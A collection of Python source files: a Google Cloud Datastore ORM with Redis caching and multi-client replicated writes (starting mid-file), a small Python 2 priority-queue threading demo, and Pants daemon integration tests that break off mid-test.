for prop_name, value_pb in helpers._property_tuples(pb):
value = CustomIterator._get_value_from_value_pb(value_pb)
entity_props[prop_name] = value
obj = model_type._dotted_dict_to_object(entity_props, key)
return obj
@staticmethod
def _get_value_from_value_pb(value_pb):
"""Given a protobuf for a Value, get the correct value.
The Cloud Datastore Protobuf API returns a Property Protobuf which
has one value set and the rest blank. This function retrieves the
the one value provided.
Some work is done to coerce the return value into a more useful type
(particularly in the case of a timestamp value, or a key value).
:type value_pb: :class:`.entity_pb2.Value`
:param value_pb: The Value Protobuf.
:rtype: object
:returns: The value provided by the Protobuf.
:raises: :class:`ValueError <exceptions.ValueError>` if no value type
has been set.
"""
value_type = value_pb.WhichOneof('value_type')
if value_type == 'timestamp_value':
result = pb_timestamp_to_datetime(value_pb.timestamp_value)
elif value_type == 'key_value':
result = CustomIterator.key_from_protobuf(value_pb.key_value)
result._type = SubclassMap.get()[result.kind]
elif value_type == 'boolean_value':
result = value_pb.boolean_value
elif value_type == 'double_value':
result = value_pb.double_value
elif value_type == 'integer_value':
result = value_pb.integer_value
elif value_type == 'string_value':
result = value_pb.string_value
elif value_type == 'blob_value':
result = value_pb.blob_value
elif value_type == 'entity_value':
result = helpers.entity_from_protobuf(value_pb.entity_value)
elif value_type == 'array_value':
result = [CustomIterator._get_value_from_value_pb(value)
for value in value_pb.array_value.values]
elif value_type == 'geo_point_value':
result = helpers.GeoPoint(value_pb.geo_point_value.latitude,
value_pb.geo_point_value.longitude)
elif value_type == 'null_value':
result = None
else:
raise ValueError('Value protobuf did not have any value set')
return result
def _item_to_object(self, iterator, entity_pb):
"""Convert a raw protobuf entity to the native object.
:type iterator: :class:`~google.api_core.page_iterator.Iterator`
:param iterator: The iterator that is currently in use.
:type entity_pb:
:class:`.entity_pb2.Entity`
:param entity_pb: An entity protobuf to convert to a native entity.
:rtype: :class:`~google.cloud.datastore.entity.Entity`
:returns: The next entity in the page.
"""
return CustomIterator.object_from_protobuf(entity_pb, model_type=self.model_type)
@staticmethod
def key_from_protobuf(pb):
"""Factory method for creating a key based on a protobuf.
The protobuf should be one returned from the Cloud Datastore
Protobuf API.
:type pb: :class:`.entity_pb2.Key`
:param pb: The Protobuf representing the key.
:rtype: :class:`google.cloud.datastore.key.Key`
:returns: a new `Key` instance
"""
path_args = []
for element in pb.path:
path_args.append(element.kind)
if element.id: # Simple field (int64)
path_args.append(element.id)
# This is safe: we expect proto objects returned will only have
# one of `name` or `id` set.
if element.name: # Simple field (string)
path_args.append(element.name)
return CustomKey(*path_args)
class CustomKey(Key):
_client: datastore.Client # client to read/query from (reads are from a single client)
_clients: List[datastore.Client] # list of all clients (writes occur to all clients)
_type: object
_cache: StrictRedis
def __init__(self, *path_args, **kwargs):
if not getattr(self, '_client', None):
raise ValueError("Datastore _client is not set. Have you called datastore_orm.initialize()?")
if not kwargs.get('namespace'):
kwargs['namespace'] = self._client.namespace
if not kwargs.get('project'):
kwargs['project'] = self._client.project
super(CustomKey, self).__init__(*path_args, **kwargs)
self._type = SubclassMap.get()[self.kind]
@classmethod
def __initialize_class__(cls, clients=None, cache=None):
cls._clients = clients
cls._client = clients[0]
cls._cache = cache
# use_cache should be passed as False if another process is writing to the same entity in Datastore
def get(self, use_cache=True, expiry=86400):
cache_key = 'datastore_orm.{}.{}'.format(self.kind, self.id_or_name)
try:
if self._cache and use_cache:
obj = self._cache.get(cache_key)
if obj:
obj = pickle.loads(obj)
return obj
except:
pass
# Get object from datastore
obj = self._client.get(self, model_type=self._type)
try:
if self._cache:
self._cache.set(cache_key, pickle.dumps(obj), expiry)
except:
pass
return obj
def _get_updated_key(self, old_key, client):
if old_key.id_or_name:
key = CustomKey(old_key.kind, old_key.id_or_name, namespace=client.namespace, project=client.project)
else:
key = CustomKey(old_key.kind, namespace=client.namespace, project=client.project)
return key
def background_delete(self, key, clients):
for client in clients:
new_key = self._get_updated_key(key, client)
self.retry_background_delete(new_key, client, attempt=1)
def retry_background_delete(self, key, client, attempt):
# Sleeping before retrying. sleep time increases for each of the 3 retries.
sleep(0.5 * attempt)
if attempt < 4:
try:
client.delete(key)
except:
logging.warning(F"Failed to delete from datastore in background in attempt {attempt}, retrying.")
self.retry_background_delete(key, client, attempt + 1)
else:
return
def delete(self):
"""Delete object from datastore.
"""
if self._cache:
cache_key = 'datastore_orm.{}.{}'.format(self.kind, self.id_or_name)
self._cache.delete(cache_key)
if len(self._clients) > 1:
Thread(target=self.background_delete, args=(self, self._clients[1:])).start()
self._clients[0].delete(self)
def get_multi(self, keys):
objects = self._client.get_multi(keys, model_type=self._type)
return objects
class CustomQuery(Query):
"""CustomQuery class overrides the google.cloud.datastore.Query class in order to use a custom
iterator class in the fetch method.
"""
model_type: object
def __init__(self, model_type, **kwargs):
super(CustomQuery, self).__init__(**kwargs)
self.model_type = model_type
def fetch(
self,
limit=None,
offset=0,
start_cursor=None,
end_cursor=None,
client=None,
eventual=False,
):
"""Execute the Query; return an iterator for the matching entities.
For example::
>>> from google.cloud import datastore
>>> _client = datastore.Client()
>>> query = _client.query(kind='Person')
>>> query.add_filter('name', '=', 'Sally')
>>> list(query.fetch())
[<Entity object>, <Entity object>, ...]
>>> list(query.fetch(1))
[<Entity object>]
:type limit: int
:param limit: (Optional) limit passed through to the iterator.
:type offset: int
:param offset: (Optional) offset passed through to the iterator.
:type start_cursor: bytes
:param start_cursor: (Optional) cursor passed through to the iterator.
:type end_cursor: bytes
:param end_cursor: (Optional) cursor passed through to the iterator.
:type client: :class:`google.cloud.datastore.client.Client`
:param client: (Optional) _client used to connect to datastore.
If not supplied, uses the query's value.
:type eventual: bool
:param eventual: (Optional) Defaults to strongly consistent (False).
Setting True will use eventual consistency,
but cannot be used inside a transaction or
will raise ValueError.
:rtype: :class:`Iterator`
:returns: The iterator for the query.
"""
if client is None:
client = self._client
return CustomIterator(
self.model_type,
self,
client,
limit=limit,
offset=offset,
start_cursor=start_cursor,
end_cursor=end_cursor,
eventual=eventual
)
class BaseModel(metaclass=abc.ABCMeta):
"""Typically, users will interact with this library by creating sub-classes of BaseModel.
BaseModel implements various helper methods (such as put, fetch etc.) to allow the user to
interact with datastore directly from the subclass object.
"""
_client: datastore.Client
_clients: List[datastore.Client]
_exclude_from_indexes_: tuple
_cache: StrictRedis
@classmethod
def __init__(cls, clients=None, cache=None):
cls._exclude_from_indexes_ = tuple()
cls._clients = clients
cls._client = clients[0]
cls._cache = cache
def dottify(self, base_name):
"""Convert a standard BaseModel object with nested objects into dot notation to maintain
compatibility with ndb created objects
Example input -
>>> class A(BaseModel):
>>> x = 1
>>> class B(BaseModel):
>>> z = 2
>>> y = A()
>>> b = B()
>>> b.dottify()
{z: 2, y.x: 1}
"""
obj_dict = vars(self)
dotted_dict = {}
for k, v in obj_dict.items():
if v is not None:
dotted_dict[base_name + '.' + k] = v
return dotted_dict
@classmethod
def _dotted_dict_to_object(cls, dict_: dict, key: Key = None):
"""Convert a dictionary that was created with dottify() back into a standard BaseModel object
>>> dict_ = {
>>> "a": 1,
>>> "b.x": 2,
>>> "b.y": 3,
>>> "c.p": [4, 5]
>>> "c.q": [6, 7]
>>> }
>>> cls._dotted_dict_to_object(dict_)
Model(a=1, b=B(x=2, y=3), c=[C(p=4, q=6), C(p=5, q=7)])
"""
dotted_pairs = {}
for k, val in dict_.copy().items():
if '.' in k:
dotted_pairs[k] = val
del dict_[k]
class_dict = {}
for k, val in dotted_pairs.items():
class_, prop_key = k.split('.', 1)
if isinstance(val, list):
class_dict[class_] = class_dict.get(class_) or list()
for i, each_val in enumerate(val):
if len(class_dict[class_]) < i + 1:
class_dict[class_].append(dict())
class_dict[class_][i][prop_key] = each_val
else:
class_dict[class_] = class_dict.get(class_) or dict()
class_dict[class_][prop_key] = val
type_hints = get_type_hints(cls)
for class_, nested_prop in class_dict.items():
if isinstance(nested_prop, list):
nested_prop_list = []
for each_nested_prop in nested_prop:
nested_prop_list.append(type_hints[class_].__args__[0](**each_nested_prop))
dict_[class_] = nested_prop_list
else:
dict_[class_] = type_hints[class_](**nested_prop)
filtered_dict = {k: v for k, v in dict_.items() if k in type_hints}
obj = cls(**filtered_dict)
if key:
obj.key = key
return obj
@classmethod
def from_entity(cls, entity):
return cls._dotted_dict_to_object(dict(entity.items()), entity.key)
def _to_entity(self):
"""Converts a BaseModel subclass object into datastore entity. This method is called just before
datastore's _client.put is called.
"""
obj_dict = copy.deepcopy(vars(self))
exclude_from_indexes = ()
try:
exclude_from_indexes = self._exclude_from_indexes_
except AttributeError:
pass
try:
key = self.key
except AttributeError:
key = CustomKey(self.__class__.__name__)
entity = datastore.Entity(key=key, exclude_from_indexes=exclude_from_indexes)
for dict_key, dict_val in obj_dict.copy().items():
if dict_val is not None:
if isinstance(dict_val, BaseModel):
# If the value is an instance of BaseModel, convert the instance
# into a "dotted" dictionary compatible with NDB entities.
del obj_dict[dict_key]
obj_dict.update(dict_val.dottify(dict_key))
if isinstance(dict_val, list) and len(dict_val) > 0 and isinstance(dict_val[0], BaseModel):
# if the value is a list of BaseModel objects
dotted_dict_list = []
dotted_dict = dict()
for i, val in enumerate(dict_val):
dotted_dict_list.append(val.dottify(dict_key))
for dict_ in dotted_dict_list:
for k, v in dict_.items():
temp_val = dotted_dict.get(k) or []
temp_val.append(v)
dotted_dict[k] = temp_val
del obj_dict[dict_key]
obj_dict.update(dotted_dict)
else:
# if the value is False-y i.e. the key has not been set in the object,
# delete the key from the object
del obj_dict[dict_key]
entity.update(obj_dict)
return entity
def put(self, expiry=86400):
"""
Put the object into datastore.
"""
# TODO (Chaitanya): Directly convert object to protobuf and call PUT instead of converting to entity first.
entity = self._to_entity()
try:
if self._cache:
cache_key = 'datastore_orm.{}.{}'.format(self.__class__.__name__, entity.key.id_or_name)
self._cache.set(cache_key, pickle.dumps(self), expiry)
except:
pass
self.key = entity.key
if 'key' in entity:
del entity['key']
self._clients[0].put(entity)
# self.background_put(entity, self._clients[1:])
if len(self._clients) > 1:
Thread(target=self.background_put, args=(entity, self._clients[1:])).start()
entity.key._type = self.__class__
self.key = entity.key
return self.key
def background_put(self, entity, clients):
for client in clients:
new_entity = copy.deepcopy(entity)
for k, v in entity.items():
if isinstance(v, CustomKey):
new_entity[k] = self._get_updated_key(v, client)
elif isinstance(v, list) and len(v) > 0 and isinstance(v[0], CustomKey):
new_entity[k] = [self._get_updated_key(old_key, client) for old_key in v]
# TODO: Handle keys in dict and nested objects
new_entity.key = self._get_updated_key(new_entity.key, client)
self.retry_background_write(new_entity, client, attempt=1)
def retry_background_write(self, entity, client, attempt):
# Sleeping before retrying. sleep time increases for each of the 3 retries.
sleep(0.5 * attempt)
if attempt < 4:
try:
client.put(entity)
except:
logging.warning(F"Failed to write to datastore in background in attempt {attempt}, retrying.")
self.retry_background_write(entity, client, attempt + 1)
else:
return
def _get_updated_key(self, old_key, client):
if old_key.id_or_name:
key = CustomKey(old_key.kind, old_key.id_or_name, namespace=client.namespace, project=client.project)
else:
key = CustomKey(old_key.kind, namespace=client.namespace, project=client.project)
return key
def background_delete(self, key, clients):
for client in clients:
new_key = self._get_updated_key(key, client)
self.retry_background_delete(new_key, client, attempt=1)
def retry_background_delete(self, key, client, attempt):
# Sleeping before retrying. sleep time increases for each of the 3 retries.
sleep(0.5 * attempt)
if attempt < 4:
try:
client.delete(key)
except:
logging.warning(F"Failed to delete from datastore in background in attempt {attempt}, retrying.")
self.retry_background_delete(key, client, attempt + 1)
else:
return
def delete(self):
"""Delete object from datastore.
"""
# Delete from cache first
if self._cache:
cache_key = 'datastore_orm.{}.{}'.format(self.__class__.__name__, self.key.id_or_name)
self._cache.delete(cache_key)
# Pass the key for deleting from other clients in background
if len(self._clients) > 1:
Thread(target=self.background_delete, args=(self.key, self._clients[1:])).start()
# Delete the key from 1st client
self._clients[0].delete(self.key)
def to_dict(self, exclude: set = None):
if type(exclude) == list:
exclude = set(exclude)
exclude = (exclude or set()) | {'key'}
dict_ = {}
for k, v in vars(self).items():
if k not in exclude:
if isinstance(v, list) and len(v) > 0 and isinstance(v[0], BaseModel):
temp_val = []
for obj in v:
temp_val.append(obj.to_dict())
dict_[k] = temp_val
elif isinstance(v, BaseModel):
dict_[k] = v.to_dict()
else:
dict_[k] = v
return dict_
@classmethod
def query(cls, **kwargs) -> CustomQuery:
kwargs["project"] = cls._client.project
if "namespace" not in kwargs:
kwargs["namespace"] = cls._client.namespace
name = cls.__name__
return CustomQuery(cls, client=cls._client, kind=cls.__name__, **kwargs)
class CustomClient(Client):
_client: datastore.Client
_cache: StrictRedis
def __init__(self, client=None, cache=None):
self._client = client
self._cache = cache
if not getattr(self, '_client', None):
raise ValueError("Datastore _client is not set. Have you called datastore_orm.initialize()?")
super(CustomClient, self).__init__(project=self._client.project, namespace=self._client.namespace,
credentials=self._client._credentials)
def get(self, key, missing=None, deferred=None,
transaction=None, eventual=False, model_type=None):
"""Retrieve an entity from a single key (if it exists).
.. note::
This is just a thin wrapper over :meth:`get_multi`.
The backend API does not make a distinction between a single key or
multiple keys in a lookup request.
:type key: :class:`google.cloud.datastore.key.Key`
:param key: The key to be retrieved from the datastore.
:type missing: list
:param missing: (Optional) If a list is passed, the key-only entities
returned by the backend as "missing" will be copied
into it.
:type deferred: list
:param deferred: (Optional) If a list is passed, the keys returned
by the backend as "deferred" will be copied into it.
:type transaction:
:class:`~google.cloud.datastore.transaction.Transaction`
:param transaction: (Optional) Transaction to use for read consistency.
If not passed, uses current transaction, if set.
:type eventual: bool
:param eventual: (Optional) Defaults to strongly consistent (False).
Setting True will use eventual consistency, but cannot
be used inside a transaction or will raise ValueError.
:rtype: :class:`google.cloud.datastore.entity.Entity` or ``NoneType``
:returns: The requested entity if it exists.
:raises: :class:`ValueError` if eventual is True and in a transaction.
"""
start = datetime.datetime.now()
entities = self.get_multi(keys=[key],
missing=missing,
deferred=deferred,
transaction=transaction,
eventual=eventual, model_type=model_type)
if entities:
end = datetime.datetime.now()
print('Time taken for get {}'.format(end - start))
return entities[0]
def get_multi(self, keys, missing=None, deferred=None,
transaction=None, eventual=False, model_type=None, expiry=86400):
"""Retrieve entities, along with their attributes.
:type keys: list of :class:`google.cloud.datastore.key.Key`
:param keys: The keys to be retrieved from the datastore.
:type missing: list
:param missing: (Optional) If a list is passed, the key-only entities
returned by the backend as "missing" will be copied
into it. If the list is not empty, an error will occur.
:type deferred: list
:param deferred: (Optional) If a list is passed, the keys returned
by the backend as "deferred" will be copied into it.
If the list is not empty, an error will occur.
:type transaction:
:class:`~google.cloud.datastore.transaction.Transaction`
:param transaction: (Optional) Transaction to use for read consistency.
If not passed, uses current transaction, if set.
:type eventual: bool
:param eventual: (Optional) Defaults to strongly consistent (False).
Setting True will use eventual consistency, but cannot
be used inside a transaction or will raise ValueError.
:rtype: list of :class:`google.cloud.datastore.entity.Entity`
:returns: The requested entities.
:raises: :class:`ValueError` if one or more of ``keys`` has a project
which does not match our project.
:raises: :class:`ValueError` if eventual is True and in a transaction.
"""
if not keys:
return []
get_multi_partial = partial(self.get_single, missing=missing, deferred=deferred, transaction=transaction,
eventual=eventual, model_type=model_type, expiry=86400)
with ThreadPoolExecutor(max_workers=min(len(keys), 10)) as executor:
basemodels = []
map_iterator = [[key] for key in keys]
results = executor.map(get_multi_partial, map_iterator)
for result in results:
basemodels.append(result[0] if result else None)
return basemodels
def get_single(self, keys, missing=None, deferred=None,
transaction=None, eventual=False, model_type=None, expiry=86400):
cache_key = 'datastore_orm.{}.{}'.format(keys[0].kind, keys[0].id_or_name)
try:
if self._cache:
obj = self._cache.get(cache_key)
if obj:
return [pickle.loads(obj)]
except:
pass
ids = set(key.project for key in keys)
for current_id in ids:
if current_id != self.project:
raise ValueError('Keys do not match project')
if transaction is None:
transaction = self.current_transaction
entity_pbs = _extended_lookup(
datastore_api=self._datastore_api,
project=self.project,
key_pbs=[key.to_protobuf() for key in keys],
eventual=eventual,
missing=missing,
deferred=deferred,
transaction_id=transaction and transaction.id,
)
if missing is not None:
missing[:] = [
CustomIterator.object_from_protobuf(missed_pb, model_type=model_type)
for missed_pb in missing]
if deferred is not None:
deferred[:] = [
CustomIterator.key_from_protobuf(deferred_pb)
for deferred_pb in deferred]
basemodels = [CustomIterator.object_from_protobuf(entity_pb, model_type=model_type)
for entity_pb in entity_pbs]
try:
if self._cache and basemodels:
self._cache.set(cache_key, pickle.dumps(basemodels[0]), expiry)
except:
pass
return basemodels
def initialize(clients, cache=None):
if not isinstance(clients, list):
clients = [clients]
orm_clients = []
for client in clients:
orm_clients.append(CustomClient(client=client, cache=cache))
BaseModel(orm_clients, cache)
CustomKey.__initialize_class__(orm_clients, cache)
|
priority_queue.py
|
# coding=utf-8
import time
import threading
from random import randint
from Queue import PriorityQueue
q = PriorityQueue()
def double(n):
return n * 2
def producer():
count = 0
while 1:
if count > 5:
break
pri = randint(0, 100)
print 'put :{}'.format(pri)
q.put((pri, double, pri)) # (priority, func, args)
count += 1
def consumer():
while 1:
if q.empty():
break
pri, task, arg = q.get()
print '[PRI:{}] {} * 2 = {}'.format(pri, arg, task(arg))
q.task_done()
time.sleep(0.1)
t = threading.Thread(target=producer)
t.start()
time.sleep(1)
t = threading.Thread(target=consumer)
t.start()
|
pantsd_integration_test.py
|
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import glob
import os
import signal
import threading
import time
import unittest
from textwrap import dedent
from typing import List, Optional, Tuple
import psutil
import pytest
from pants.testutil.pants_integration_test import (
PantsJoinHandle,
read_pantsd_log,
setup_tmpdir,
temporary_workdir,
)
from pants.util.contextutil import environment_as, temporary_dir, temporary_file
from pants.util.dirutil import (
maybe_read_file,
rm_rf,
safe_file_dump,
safe_mkdir,
safe_open,
safe_rmtree,
touch,
)
from pants_test.pantsd.pantsd_integration_test_base import PantsDaemonIntegrationTestBase, attempts
def launch_file_toucher(f):
"""Launch a loop to touch the given file, and return a function to call to stop and join it."""
if not os.path.isfile(f):
raise AssertionError("Refusing to touch a non-file.")
halt = threading.Event()
def file_toucher():
while not halt.isSet():
touch(f)
time.sleep(1)
thread = threading.Thread(target=file_toucher)
thread.daemon = True
thread.start()
def join():
halt.set()
thread.join(timeout=10)
return join
compilation_failure_dir_layout = {
os.path.join("compilation_failure", "main.py"): "if __name__ == '__main__':\n import sys¡",
os.path.join(
"compilation_failure", "BUILD"
): "python_library()\npex_binary(name='bin', entry_point='main.py')",
}
class TestPantsDaemonIntegration(PantsDaemonIntegrationTestBase):
hermetic = False
def test_pantsd_run(self):
with self.pantsd_successful_run_context(log_level="debug") as ctx:
ctx.runner(["list", "3rdparty::"])
ctx.checker.assert_started()
ctx.runner(["list", "3rdparty::"])
ctx.checker.assert_running()
def test_pantsd_broken_pipe(self):
with self.pantsd_test_context() as (workdir, pantsd_config, checker):
run = self.run_pants_with_workdir(
"help | head -1", workdir=workdir, config=pantsd_config, shell=True
)
self.assertNotIn("broken pipe", run.stderr.lower())
checker.assert_started()
def test_pantsd_pantsd_runner_doesnt_die_after_failed_run(self):
with self.pantsd_test_context() as (workdir, pantsd_config, checker):
# Run target that throws an exception in pants.
with setup_tmpdir(compilation_failure_dir_layout) as tmpdir:
self.run_pants_with_workdir(
["lint", os.path.join(tmpdir, "compilation_failure", "main.py")],
workdir=workdir,
config=pantsd_config,
).assert_failure()
checker.assert_started()
# Assert pantsd is in a good functional state.
self.run_pants_with_workdir(
["help"], workdir=workdir, config=pantsd_config
).assert_success()
checker.assert_running()
def test_pantsd_lifecycle_invalidation(self):
"""Run with different values of daemon=True options, which should trigger restarts."""
with self.pantsd_successful_run_context() as ctx:
last_pid = None
for idx in range(3):
# Run with a different value of a daemon=True option in each iteration.
ctx.runner([f"--pantsd-invalidation-globs=ridiculous{idx}", "help"])
next_pid = ctx.checker.assert_started()
if last_pid is not None:
self.assertNotEqual(last_pid, next_pid)
last_pid = next_pid
def test_pantsd_lifecycle_non_invalidation(self):
with self.pantsd_successful_run_context() as ctx:
cmds = (["help"], ["--no-colors", "help"], ["help"])
last_pid = None
for cmd in cmds:
# Run with a CLI flag.
ctx.runner(cmd)
next_pid = ctx.checker.assert_started()
if last_pid is not None:
self.assertEqual(last_pid, next_pid)
last_pid = next_pid
def test_pantsd_lifecycle_non_invalidation_on_config_string(self):
with temporary_dir() as dist_dir_root, temporary_dir() as config_dir:
# Create a variety of config files that change an option that does _not_ affect the
# daemon's fingerprint (only the Scheduler's), and confirm that it stays up.
config_files = [
os.path.abspath(os.path.join(config_dir, f"pants.{i}.toml")) for i in range(3)
]
for idx, config_file in enumerate(config_files):
print(f"writing {config_file}")
with open(config_file, "w") as fh:
fh.write(
f"""[GLOBAL]\npants_distdir = "{os.path.join(dist_dir_root, str(idx))}"\n"""
)
with self.pantsd_successful_run_context() as ctx:
cmds = [[f"--pants-config-files={f}", "help"] for f in config_files]
last_pid = None
for cmd in cmds:
ctx.runner(cmd)
next_pid = ctx.checker.assert_started()
if last_pid is not None:
self.assertEqual(last_pid, next_pid)
last_pid = next_pid
def test_pantsd_lifecycle_shutdown_for_broken_scheduler(self):
with self.pantsd_test_context() as (workdir, config, checker):
# Run with valid options.
self.run_pants_with_workdir(["help"], workdir=workdir, config=config).assert_success()
checker.assert_started()
# And again with invalid scheduler-fingerprinted options that trigger a re-init.
self.run_pants_with_workdir(
["--backend-packages=nonsensical", "help"], workdir=workdir, config=config
).assert_failure()
checker.assert_stopped()
def test_pantsd_aligned_output(self) -> None:
# Set for pytest output display.
self.maxDiff = None
cmds = [["help", "goals"], ["help", "targets"], ["roots"]]
config = {
"GLOBAL": {
# These must match the ones we configure in pantsd_integration_test_base.py.
"backend_packages": ["pants.backend.python", "pants.backend.python.lint.flake8"],
}
}
non_daemon_runs = [self.run_pants(cmd, config=config) for cmd in cmds]
with self.pantsd_successful_run_context() as ctx:
daemon_runs = [ctx.runner(cmd) for cmd in cmds]
ctx.checker.assert_started()
for cmd, run in zip(cmds, daemon_runs):
print(f"(cmd, run) = ({cmd}, {run.stdout}, {run.stderr})")
self.assertNotEqual(run.stdout, "", f"Empty stdout for {cmd}")
for run_pair in zip(non_daemon_runs, daemon_runs):
non_daemon_stdout = run_pair[0].stdout
daemon_stdout = run_pair[1].stdout
for line_pair in zip(non_daemon_stdout.splitlines(), daemon_stdout.splitlines()):
assert line_pair[0] == line_pair[1]
@unittest.skip("flaky: https://github.com/pantsbuild/pants/issues/7622")
def test_pantsd_filesystem_invalidation(self):
"""Runs with pantsd enabled, in a loop, while another thread invalidates files."""
with self.pantsd_successful_run_context() as ctx:
cmd = ["list", "::"]
ctx.runner(cmd)
ctx.checker.assert_started()
# Launch a separate thread to poke files in 3rdparty.
join = launch_file_toucher("3rdparty/jvm/com/google/auto/value/BUILD")
# Repeatedly re-list 3rdparty while the file is being invalidated.
for _ in range(0, 16):
ctx.runner(cmd)
ctx.checker.assert_running()
join()
def test_pantsd_client_env_var_is_inherited_by_pantsd_runner_children(self):
expected_key = "TEST_ENV_VAR_FOR_PANTSD_INTEGRATION_TEST"
expected_value = "333"
with self.pantsd_successful_run_context() as ctx:
# First, launch the daemon without any local env vars set.
ctx.runner(["help"])
ctx.checker.assert_started()
# Then, set an env var on the secondary call.
# We additionally set the `HERMETIC_ENV` env var to allow the integration test harness
# to pass this variable through.
env = {
expected_key: expected_value,
"HERMETIC_ENV": expected_key,
}
with environment_as(**env):
result = ctx.runner(
["run", "testprojects/src/python/print_env", "--", expected_key]
)
ctx.checker.assert_running()
self.assertEqual(expected_value, "".join(result.stdout).strip())
def test_pantsd_launch_env_var_is_not_inherited_by_pantsd_runner_children(self):
with self.pantsd_test_context() as (workdir, pantsd_config, checker):
with environment_as(NO_LEAKS="33"):
self.run_pants_with_workdir(
["help"], workdir=workdir, config=pantsd_config
).assert_success()
checker.assert_started()
self.run_pants_with_workdir(
["run", "testprojects/src/python/print_env", "--", "NO_LEAKS"],
workdir=workdir,
config=pantsd_config,
).assert_failure()
checker.assert_running()
def test_pantsd_touching_a_file_does_not_restart_daemon(self):
test_file = "testprojects/src/python/print_env/main.py"
config = {
"GLOBAL": {"pantsd_invalidation_globs": '["testprojects/src/python/print_env/*"]'}
}
with self.pantsd_successful_run_context(extra_config=config) as ctx:
ctx.runner(["help"])
ctx.checker.assert_started()
# Let any fs events quiesce.
time.sleep(5)
ctx.checker.assert_running()
touch(test_file)
# Permit ample time for the async file event propagate in CI.
time.sleep(10)
ctx.checker.assert_running()
def test_pantsd_invalidation_file_tracking(self):
test_dir = "testprojects/src/python/print_env"
config = {"GLOBAL": {"pantsd_invalidation_globs": f'["{test_dir}/*"]'}}
with self.pantsd_successful_run_context(extra_config=config) as ctx:
ctx.runner(["help"])
ctx.checker.assert_started()
# Let any fs events quiesce.
time.sleep(5)
ctx.checker.assert_running()
def full_pantsd_log():
return "\n".join(read_pantsd_log(ctx.workdir))
# Create a new file in test_dir
with temporary_file(suffix=".py", binary_mode=False, root_dir=test_dir) as temp_f:
temp_f.write("import that\n")
temp_f.close()
ctx.checker.assert_stopped()
self.assertIn("saw filesystem changes covered by invalidation globs", full_pantsd_log())
def test_pantsd_invalidation_pants_toml_file(self):
# Test tmp_pants_toml (--pants-config-files=$tmp_pants_toml)'s removal
tmp_pants_toml = os.path.abspath("testprojects/test_pants.toml")
# Create tmp_pants_toml file
with safe_open(tmp_pants_toml, "w") as f:
f.write("[DEFAULT]\n")
with self.pantsd_successful_run_context() as ctx:
ctx.runner([f"--pants-config-files={tmp_pants_toml}", "help"])
ctx.checker.assert_started()
time.sleep(10)
# Delete tmp_pants_toml
os.unlink(tmp_pants_toml)
ctx.checker.assert_stopped()
def test_pantsd_pid_deleted(self):
with self.pantsd_successful_run_context() as ctx:
ctx.runner(["help"])
ctx.checker.assert_started()
# Let any fs events quiesce.
time.sleep(10)
ctx.checker.assert_running()
subprocess_dir = ctx.pantsd_config["GLOBAL"]["pants_subprocessdir"]
safe_rmtree(subprocess_dir)
ctx.checker.assert_stopped()
def test_pantsd_pid_change(self):
with self.pantsd_successful_run_context() as ctx:
ctx.runner(["help"])
ctx.checker.assert_started()
# Let any fs events quiesce.
time.sleep(10)
ctx.checker.assert_running()
subprocess_dir = ctx.pantsd_config["GLOBAL"]["pants_subprocessdir"]
(pidpath,) = glob.glob(os.path.join(subprocess_dir, "*", "pantsd", "pid"))
with open(pidpath, "w") as f:
f.write("9")
ctx.checker.assert_stopped()
# Remove the pidfile so that the teardown script doesn't try to kill process 9.
os.unlink(pidpath)
@pytest.mark.skip(reason="flaky: https://github.com/pantsbuild/pants/issues/8193")
def test_pantsd_memory_usage(self):
"""Validates that after N runs, memory usage has increased by no more than X percent."""
number_of_runs = 10
max_memory_increase_fraction = 0.40 # TODO https://github.com/pantsbuild/pants/issues/7647
with self.pantsd_successful_run_context() as ctx:
# NB: This doesn't actually run against all testprojects, only those that are in the chroot,
# i.e. explicitly declared in this test file's BUILD.
cmd = ["list", "testprojects::"]
ctx.runner(cmd).assert_success()
initial_memory_usage = ctx.checker.current_memory_usage()
for _ in range(number_of_runs):
ctx.runner(cmd).assert_success()
ctx.checker.assert_running()
final_memory_usage = ctx.checker.current_memory_usage()
self.assertTrue(
initial_memory_usage <= final_memory_usage,
"Memory usage inverted unexpectedly: {} > {}".format(
initial_memory_usage, final_memory_usage
),
)
increase_fraction = (float(final_memory_usage) / initial_memory_usage) - 1.0
self.assertTrue(
increase_fraction <= max_memory_increase_fraction,
"Memory usage increased more than expected: {} -> {}: {} actual increase (expected < {})".format(
initial_memory_usage,
final_memory_usage,
increase_fraction,
max_memory_increase_fraction,
),
)
def test_pantsd_max_memory_usage(self):
"""Validates that the max_memory_usage setting is respected."""
# We set a very, very low max memory usage, which forces pantsd to restart immediately.
max_memory_usage_bytes = 130
with self.pantsd_successful_run_context() as ctx:
# TODO: We run the command, but we expect it to race pantsd shutting down, so we don't
# assert success. https://github.com/pantsbuild/pants/issues/8200 will address waiting
# until after the current command completes to invalidate the scheduler, at which point
# we can assert success here.
ctx.runner(
[f"--pantsd-max-memory-usage={max_memory_usage_bytes}", "list", "testprojects::"]
)
# Assert that a pid file is written, but that the server stops afterward.
ctx.checker.assert_started_and_stopped()
def test_pantsd_invalidation_stale_sources(self):
test_path = "daemon_correctness_test_0001"
test_build_file = os.path.join(test_path, "BUILD")
test_src_file = os.path.join(test_path, "some_file.py")
filedeps_cmd = ["--files-not-found-behavior=warn", "filedeps", test_path]
try:
with self.pantsd_successful_run_context() as ctx:
safe_mkdir(test_path, clean=True)
ctx.runner(["help"])
ctx.checker.assert_started()
safe_file_dump(
test_build_file, "python_library(sources=['some_non_existent_file.py'])"
)
non_existent_file = os.path.join(test_path, "some_non_existent_file.py")
result = ctx.runner(filedeps_cmd)
ctx.checker.assert_running()
assert non_existent_file not in result.stdout
safe_file_dump(test_build_file, "python_library(sources=['*.py'])")
result = ctx.runner(filedeps_cmd)
ctx.checker.assert_running()
assert non_existent_file not in result.stdout
safe_file_dump(test_src_file, "print('hello')\n")
result = ctx.runner(filedeps_cmd)
ctx.checker.assert_running()
assert test_src_file in result.stdout
finally:
rm_rf(test_path)
@unittest.skip("TODO https://github.com/pantsbuild/pants/issues/7654")
def test_pantsd_parse_exception_success(self):
# This test covers the case described in #6426, where a run that is failing fast due to an
# exception can race other completing work. We expect all runs to fail due to the error
# that has been introduced, but none of them should hang.
test_path = "testprojects/3rdparty/this_is_definitely_not_a_valid_directory"
test_build_file = os.path.join(test_path, "BUILD")
invalid_symbol = "this_is_definitely_not_a_valid_symbol"
try:
safe_mkdir(test_path, clean=True)
safe_file_dump(test_build_file, f"{invalid_symbol}()")
for _ in range(3):
with self.pantsd_run_context(success=False) as ctx:
result = ctx.runner(["list", "testprojects::"])
